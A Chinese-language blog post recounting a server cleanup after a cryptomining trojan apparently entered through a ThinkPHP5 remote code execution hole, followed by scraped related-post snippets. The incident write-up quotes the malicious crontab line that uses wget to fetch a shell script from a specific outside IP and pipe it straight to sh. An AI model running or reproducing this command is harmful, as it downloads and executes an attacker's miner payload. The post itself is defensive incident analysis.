2. 程式人生 > >記一次掛馬清除經歷:處理一個利用thinkphp5遠端程式碼執行漏洞挖礦的木馬

記一次掛馬清除經歷:處理一個利用thinkphp5遠端程式碼執行漏洞挖礦的木馬

阿新 發佈:2018-12-25

昨天發現 一臺伺服器突然慢了 top 顯示 幾個程序100%以上的cpu使用

執行命令為 :

/tmp/php  -s /tmp/p2.conf

基本可以確定是被掛馬了

下一步確定來源 

last 沒有登陸記錄

先幹掉這幾個程序,但是幾分鐘之後又出現了

先看看這個木馬想幹什麼吧

netstat 看到 這個木馬開啟了一個埠和國外的某個ip建立了連線

但是tcpdump了一小會兒 沒有發現任何資料傳遞

這他是想幹啥?

繼續檢視日誌吧 

在cron日誌中發現了www使用者 有一個crontab定時操作 基本就是這個問題了

ls /var/spool/cron/crontabs/www

wget -q -O - http://83.220.169.247/cr3.sh | sh > /dev/null 2>&1

相關推薦

清除經歷處理一個利用thinkphp5遠端程式碼執行漏洞木馬

昨天發現 一臺伺服器突然慢了 top 顯示 幾個程序100%以上的cpu使用 執行命令為 : /tmp/php  -s /tmp/p2.conf 基本可以確定是被掛馬了 下一步確定來源  last 沒有登陸記錄 先幹掉這幾個程序,但是幾分鐘之後又出

克隆管理員的經歷

註冊表 克隆管理員半夜Server 2008R2安裝MS17-010補丁時,重啟系統 發現系統密碼忘記了還好本地登錄的安全策略留了一個guest用戶本地搭建了DVWA WEB滲透測試環境 權限為system通過漏洞上傳過狗一句話木馬木馬權限為system權限可以創建用戶 但是無法將用戶添加至管理員組

Python爬蟲開發經歷

light 情況 獲取 數據類型 true charm req 是我 遇到 為啥要做Python爬蟲,是因為我去找電影的某個網站有點坑,它支持tag標簽查詢自己喜歡的電影,但是不支持雙標簽或者三標簽查詢。由於一個電影對應多種類型(tag),這就意味著,我需要進入這個電影介紹

B站答題經歷

style sans spa ima .com 選擇題 科技 nbsp 結構 第一題部分:社區規範卷 --------- ------------ 第二題:社區規範第二部分 -------------------- 第三部分自由選擇題

失敗的面試經歷

pub collect int 抽象 final 順序 多重 arr boolean 1. 前言  前幾天,濟南的一家公司來我們學校進行校招。工作室的創始人在那家公司混的還不錯,本來人家公司並沒有把我們學校作為被招聘的學校,是我們工作室的創始人極力推薦才來我們學校

伺服器Tomcat優化經歷

公司需要一臺測試伺服器來做測試用,所以花了點時間把服務全部部署好,在部署好war包之後,發現Tomcat訪問超級慢。 1、進入Tomcat的bin目錄下,執行 ./catalina.sh run命令,在前臺列印執行資訊,首先看其有沒有報錯。好,沒有報錯,進行下一步。 1)修改你的jdk目錄下/

生成pdf的經歷

繼上次踩完h5的坑後,迎來了新需求,需要生成pdf,內容包括封面,目錄,然後就是正文,正文的內容包括,頁首,頁尾,圖表,表格,圖片,地圖 最後實現的效果 封面 目錄 主體內容 使用的框架 jspdf (放棄) 在網上搜到有關於jspdf的問題

伺服器被黑經歷

從接手公司伺服器兩個半星期經常性的無法正常ssh登陸,十次裡面有九次半都是顯示 ssh_exchange_identification:read:connection reset by peer 也谷歌很多種原因和解決方案,無非是分兩種:一是執行緒滿了,需要更改

伺服器被攻擊經歷

    從接手公司伺服器兩個半星期經常性的無法正常ssh登陸,十次裡面有九次半都是顯示 ssh_exchange_identification:read:connection reset by peer     也谷歌很多種原因和解決方案,無非是分兩種:一是執行緒滿了,需要更

主機入侵攻防大戰firewalld防火牆指定的IP段的埠訪問控制

一、背景 一大早來公司,登入那臺暴露在外網的伺服器,登入成功的時候,看到160000+次登入失敗的記錄,看到這個我和我的小夥伴們都驚呆了,是誰那麼執著?小夥伴還開玩笑說是不是誰跟你有世仇啊,這麼搞你!來活了,我的伺服器我做主,搞起,who怕who? 二、

壓測問題定位connection reset by peer,TCP三握手後服務端傳送RST

問題描述    這兩天用Go做一個比較簡單的task:後端有HTTPServer和TCPServer。客戶端通過http接入到HTTPServer,HTTPServer通過RPC將請求傳送到TCPServer,所有的業務邏輯都由TCPServer處理。    壓測:自己的ma

fis3+react開發經歷

前言: 雖然說是記錄fis3+react的一次開發經歷。但是在專案的上線前幾天收到公司TC委員會的郵件,因為react的開源協議讓找到react的替代方案,並且逐步下線線上的react專案。真的是可以用“出師未捷身先死”來形容這次開發了。 不過經過調研以後發

才過的坑label巢狀input

一次這樣寫頁面: <label> <input type='number'> <input type='number'> </label> 於是,發現點選第二個input的時候會在safari瀏覽器回到第一個i

linux伺服器被攻擊的處理經歷

首先發現IO、流量異常。查詢登入記錄,果不其然last命令沒有結果,/var/log/wtmp檔案被刪除。查詢/var/log/secure檔案中的登入記錄:grep "Accept" /var/log/secure查dstat的日誌檔案,正是10:51分開始出現IO異常。用

百度面試經歷:

一、一面技術面:1、solr全文索引;2、寫一個二分查詢;3、HashMap資料結構(JDK1.8為紅黑樹->並未看1.8的原始碼)問的很細,最後會問桶下面只能有連結串列實現嗎?就是想問1.8的實現;4、MySQL優化和索引;5、spring的DI,IOC、AOP;6、

網站被黑經歷

blog http RoCE .proto lang 解決方法 protocol parent cti 問題原由 早上突然接到客戶電話,網站在微信中無法打開,被微信攔截 在pc端訪問網站,點擊首頁中任何一個url都會跳轉到第三方網站,恍然大悟,網站是被黑了 問題分析 發現網

阿里巴巴一面經歷,作為名java程式設計師終於找到了自己差距!

面試前的故事 上週在拉勾上收到一個螞蟻金服的大哥要我的簡歷,當時很驚訝,居然有螞蟻金服的找到我,然後想都沒想就給了。 受

網路爬蟲之js逆向解密經歷

1 引言 數月前寫過某網站(請原諒我的掩耳盜鈴)的爬蟲,這兩天需要重新採集一次,用的是scrapy-redis框架,本以為二次爬取可以輕鬆完成的,可沒想到爬蟲啟動沒幾秒,出現了大堆的重試提示,心裡頓時就咯噔一下,悠閒時光估計要結束了。 仔細分析後,發現是獲取店鋪列表的請求出現問題,通過瀏覽器抓包,發現請求

【圖解】手撕演算法面試位元組跳動的面試官把我四連擊了

位元組跳動這家公司,應該是所有秋招的公司中,對演算法最重視的一個了,每次面試基本都會讓你手撕演算法,今天這篇文章就記錄下當時被問到的幾個演算法題,並且每個演算法題我都詳細著給出了最優解,下面再現當時的面試場景。看完一定讓你有所收穫 一、小牛試刀:有效括號 大部分情況下,面試官都會問一個不怎麼難的問題,不過你千

服務器IO過高處理過程

linux 服務器 緩沖區 io負載 記一次服務器IO過高處理過程 一、背景 在一次上線升級後,發現兩臺tomcat服務器的IOwait一直超過100ms,高峰時甚至超過300ms,檢查服務器發現CPU負載,內存的使用率都不高。問題可能出現在硬盤讀寫,而且那塊硬盤除了寫日誌外,沒有其他